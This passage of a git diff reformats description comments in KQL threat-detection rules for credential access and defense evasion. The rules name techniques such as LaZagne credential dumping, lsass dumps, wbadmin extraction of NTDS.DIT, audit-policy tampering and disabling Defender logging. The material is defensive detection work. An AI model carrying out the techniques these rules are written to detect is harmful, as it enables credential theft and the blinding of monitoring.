users credentials. +// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003 // False Positives: diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql index 39e5888b..a266e7c9 100644 --- a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql +++ b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql @@ -3,8 +3,7 @@ // Date: 2024-06-24 // Level: medium // Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. -LaZagne has been leveraged multiple times by threat actors in order to dump credentials. - +// LaZagne has been leveraged multiple times by threat actors in order to dump credentials. // MITRE Tactic: Credential Access // Tags: attack.credential-access // False Positives: diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql index f71507b9..b6c71489 100644 --- a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql +++ b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql @@ -3,7 +3,6 @@ // Date: 2024-06-27 // Level: high // Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. - // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1558.003 // False Positives: diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql index 44f3e002..9d2c5df5 100644 --- a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql +++ b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql @@ -3,7 +3,6 @@ // Date: 2023-12-04 // Level: high // Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql index f65cbe0d..187ef0d6 100644 --- a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql +++ b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-02-12 // Level: low // Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". -Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. - +// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. // MITRE Tactic: Credential Access // Tags: attack.t1003, attack.credential-access diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql index a84d7439..88b329e7 100644 --- a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql +++ b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql @@ -3,9 +3,8 @@ // Date: 2024-02-12 // Level: medium // Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". -This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. -In order to dump the process memory or perform other nefarious actions. - +// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. +// In order to dump the process memory or perform other nefarious actions. // MITRE Tactic: Credential Access // Tags: attack.t1003, attack.credential-access diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql index 32fc34d6..7a57b6a5 100644 --- a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql +++ b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql @@ -3,7 +3,6 @@ // Date: 2019-10-24 // Level: high // Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. - // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003.001 // False Positives: diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql index 298e6b33..447f1f17 100644 --- a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql @@ -3,7 +3,6 @@ // Date: 2024-07-22 // Level: medium // Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process. - // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1528 diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql index 285f26e8..7675a517 100644 --- a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql +++ b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-02-03 // Level: medium // Description: Detects usage of "cmdkey.exe" to add generic credentials. -As an example, this can be used before connecting to an RDP session via command line interface. - +// As an example, this can be used before connecting to an RDP session via command line interface. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003.005 // False Positives: diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql index 0b259a6a..ea618367 100644 --- a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql +++ b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql @@ -3,8 +3,7 @@ // Date: 2022-08-12 // Level: medium // Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. -This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions. - +// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1552.006 diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/Credential Access/potential_browser_data_stealing.kql index 1303b99a..a619e777 100644 --- a/KQL/rules/Credential Access/potential_browser_data_stealing.kql +++ b/KQL/rules/Credential Access/potential_browser_data_stealing.kql @@ -3,9 +3,8 @@ // Date: 2022-12-23 // Level: medium // Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. -Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. -Web browsers typically store the credentials in an encrypted format within a credential store. - +// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. +// Web browsers typically store the credentials in an encrypted format within a credential store. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1555.003 diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql index f652df5b..716ca4a5 100644 --- a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql +++ b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql @@ -3,9 +3,8 @@ // Date: 2019-10-21 // Level: medium // Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". -Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. -An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. - +// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. +// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.discovery, attack.t1040 // False Positives: diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql index 4f3ce6af..3a9cb5be 100644 --- a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql +++ b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql @@ -3,8 +3,7 @@ // Date: 2025-04-03 // Level: medium // Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). -This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance. - +// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1552.001 // False Positives: diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql index af3aa6ba..40610060 100644 --- a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql +++ b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql @@ -3,8 +3,7 @@ // Date: 2021-11-26 // Level: high // Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. -Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. - +// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003.001 diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql index f2753d96..785fe69a 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql @@ -3,8 +3,7 @@ // Date: 2022-09-16 // Level: medium // Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. -The database might contain authentication tokens and other sensitive information about the logged in accounts. - +// The database might contain authentication tokens and other sensitive information about the logged in accounts. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1528 diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql index 3bec20e7..2f1b5339 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql @@ -3,8 +3,7 @@ // Date: 2022-09-09 // Level: medium // Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. -This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. - +// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.discovery, attack.t1552 // False Positives: diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql index 1d8585e5..5a664c76 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql @@ -3,9 +3,8 @@ // Date: 2022-10-25 // Level: medium // Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". -JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. -Threat actors may search for these tokens to steal them for lateral movement or privilege escalation. - +// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. +// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1528, attack.t1552.001 diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql index a14e467d..e4df5719 100644 --- a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql +++ b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql @@ -3,8 +3,7 @@ // Date: 2025-05-22 // Level: high // Description: Detects the use of reg.exe to export registry paths associated with third-party credentials. -Credential stealers have been known to use this technique to extract sensitive information from the registry. - +// Credential stealers have been known to use this technique to extract sensitive information from the registry. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1552.002 diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql index 6938ed3d..46c9bc5e 100644 --- a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql +++ b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-05-10 // Level: high // Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. -Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. - +// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003.003 // False Positives: diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql index 4a8e9c75..484f1b7d 100644 --- a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql +++ b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-05-10 // Level: high // Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. -Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. - +// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003.003 diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql index 1a903487..8933c2c7 100644 --- a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql +++ b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql @@ -3,9 +3,8 @@ // Date: 2025-05-22 // Level: low // Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. -Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. -This behavior is often commonly observed in credential stealing malware. - +// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. +// This behavior is often commonly observed in credential stealing malware. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217 // False Positives: diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql index fae1af62..a4241782 100644 --- a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql +++ b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql @@ -3,7 +3,6 @@ // Date: 2023-04-18 // Level: high // Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql index a3af7520..247df255 100644 --- a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql +++ b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql @@ -3,8 +3,7 @@ // Date: 2023-04-17 // Level: high // Description: Detects usage of winget to add a new insecure (http) download source. -Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) - +// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql index b2d5e948..f0cb21a5 100644 --- a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql +++ b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql @@ -3,7 +3,6 @@ // Date: 2023-11-05 // Level: high // Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive". - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql index 381c132f..8730c452 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-06-09 // Level: medium // Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql index 7ffb880d..4fc52334 100644 --- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql @@ -3,8 +3,7 @@ // Date: 2021-02-02 // Level: high // Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. -This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. - +// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql index 12fe1441..c0c1dfd3 100644 --- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql @@ -3,8 +3,7 @@ // Date: 2021-12-18 // Level: high // Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. -This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. - +// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql index 954d84b1..0cfe2afe 100644 --- a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql +++ b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql @@ -3,9 +3,8 @@ // Date: 2025-10-17 // Level: high // Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. -This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. -Removal of audit rules can significantly impair detection of malicious activities on the affected system. - +// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. +// Removal of audit rules can significantly impair detection of malicious activities on the affected system. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.012 // False Positives: diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql index da220433..58287020 100644 --- a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql +++ b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql @@ -3,9 +3,8 @@ // Date: 2025-10-18 // Level: high // Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. -This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) -which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. - +// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) +// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql index 69290c62..f69d45f0 100644 --- a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql +++ b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql @@ -3,9 +3,8 @@ // Date: 2020-10-23 // Level: high // Description: Detects attackers using tooling with bad opsec defaults. -E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. -One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. - +// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. +// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.011 // False Positives: diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql index 69577313..387192a4 100644 --- a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql +++ b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql @@ -3,10 +3,9 @@ // Date: 2024-07-11 // Level: low // Description: Detects the execution of "BitLockerToGo.EXE". -BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. -This is a rarely used application and usage of it at all is worth investigating. -Malware such as Lumma stealer has been seen using this process as a target for process hollowing. - +// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. +// This is a rarely used application and usage of it at all is worth investigating. +// Malware such as Lumma stealer has been seen using this process as a target for process hollowing. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql index 33ceb73a..7b0293cc 100644 --- a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql +++ b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql @@ -3,8 +3,7 @@ // Date: 2024-01-17 // Level: medium // Description: Detects a CodePage modification using the "mode.com" utility to Russian language. -This behavior has been used by threat actors behind Dharma ransomware. - +// This behavior has been used by threat actors behind Dharma ransomware. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 // False Positives: diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql index 6e3610c5..dbdd9d4a 100644 --- a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql +++ b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql @@ -3,8 +3,7 @@ // Date: 2020-10-07 // Level: medium // Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. -This utility can be abused in order to run custom COM object created in the registry. - +// This utility can be abused in order to run custom COM object created in the registry. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql index 42e0e821..05e178b2 100644 --- a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql +++ b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql @@ -3,8 +3,7 @@ // Date: 2022-12-01 // Level: medium // Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). -Usually this technique is used to achieve DLL hijacking. - +// Usually this technique is used to achieve DLL hijacking. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql index 938e10c9..6901b5b2 100644 --- a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql +++ b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql @@ -3,7 +3,6 @@ // Date: 2022-08-19 // Level: medium // Description: Detects the execution of DeviceCredentialDeployment to hide a process from view. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql index 0705d2cf..d3c7427f 100644 --- a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql +++ b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql @@ -3,10 +3,9 @@ // Date: 2022-01-15 // Level: low // Description: Detects execution of the builtin "rmdir" command in order to delete directories. -Adversaries may delete files left behind by the actions of their intrusion activity. -Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. -Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. - +// Adversaries may delete files left behind by the actions of their intrusion activity. +// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.004 diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql index 969916f8..10ed4f45 100644 --- a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql +++ b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql @@ -3,12 +3,11 @@ // Date: 2024-07-11 // Level: high // Description: Detects changes to "DsrmAdminLogonBehavior" registry value. -During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. -Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. -If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. -If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. -If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. - +// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. +// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. +// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. +// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. +// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556 diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql index 14f19685..f54e7ec6 100644 --- a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql @@ -3,9 +3,8 @@ // Date: 2025-07-09 // Level: high // Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. -By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events -from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. - +// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events +// from being logged, effectively blinding monitoring 